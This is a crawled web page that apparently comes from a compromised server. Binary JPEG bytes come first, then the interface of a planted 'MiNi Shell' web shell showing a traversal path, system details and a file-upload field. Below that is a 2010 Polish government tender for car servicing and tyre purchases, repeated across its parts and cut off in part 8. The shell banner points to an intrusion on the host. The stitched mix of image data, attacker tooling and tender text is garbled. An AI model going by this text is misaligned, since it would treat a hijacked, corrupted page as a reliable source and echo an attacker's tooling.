JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100615/153543-N-2010.html

<p class="kh_header"><b>Warszawa: Przeglądy pogwarancyjne, naprawy samochodów służbowych, przeglądy rejestracyjne, sezonowa wymiana opon, zakup opon oraz akcesoriów samochodowych.</b><br>
<b>Numer ogłoszenia: 153543 - 2010; data zamieszczenia: 15.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rynku Rolnego , ul. Nowy Świat 6/12, 00-400 Warszawa, woj. mazowieckie, tel. 022 6617347, faks 022 6617535.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeglądy pogwarancyjne, naprawy samochodów służbowych, przeglądy rejestracyjne, sezonowa wymiana opon, zakup opon oraz akcesoriów samochodowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> a) 2 000 PLN (słownie: dwa tysiące złotych) - dla zadania częściowego nr 1;
b) 600 PLN (słownie: sześćset złotych) - dla zadania częściowego nr 2;
c) 800 PLN (słownie: osiemset złotych) - dla zadania częściowego nr 3;
d) 600 PLN (słownie: sześćset złotych) - dla zadania częściowego nr 4;
e) 400 PLN (słownie: czterysta złotych) - dla zadania częściowego nr 5;
f) 500 PLN (słownie: pięćset złotych) - dla zadania częściowego nr 6;
g) 600 PLN (słownie: sześćset złotych) - dla zadania częściowego nr 7;
h) 500 PLN (słownie: pięćset złotych) - dla zadania częściowego nr 8;
i) 600 PLN (słownie: sześćset złotych) - dla zadania częściowego nr 9;
j) 500 PLN (słownie: pięćset złotych) - dla zadania częściowego nr 10;
k) 400 PLN (słownie: czterysta złotych) - dla zadania częściowego nr 11;
l) 600 PLN (słownie: sześćset złotych) - dla zadania częściowego nr 12;
ł) 900 PLN (słownie: dziewięćset złotych) - dla zadania częściowego nr 13;
m) 700 PLN (słownie: siedemset złotych) - dla zadania częściowego nr 14;
n) 500 PLN (słownie: pięćset złotych) - dla zadania częściowego nr 15;
o) 500 PLN (słownie: pięćset złotych) - dla zadania częściowego nr 16.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni powyższy warunek, jeżeli wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje minimum 2 usługi tożsame z przedmiotem zamówienia (tj. polegające na wykonywaniu dla minimum 10 sztuk samochodów służbowych przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych) o wartości minimum 25 000,00 zł. (słownie: dwadzieścia pięć tysięcy złotych) brutto każda.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3 - Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w okresie jej obowiązywania w zakresie:
a) zmian w wykazie samochodów służbowych Zamawiającego,
b) zmian w wykazie serwisów Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rynku Rolnego, ul. Nowy Świat 6/12, 00 - 400 Warszawa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2010 godzina 12:00, miejsce: w siedzibie Agencji Rynku Rolnego w Warszawie, przy ul. Nowy Świat 6/12, w Kancelarii Ogólnej, hol główny, parter, wejście D/A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie częściowe nr 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie częściowe nr 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie częściowe nr 3..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie częściowe nr 4..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie częściowe nr 5..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie częściowe nr 6..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie częściowe nr 7..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie częściowe nr 8..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
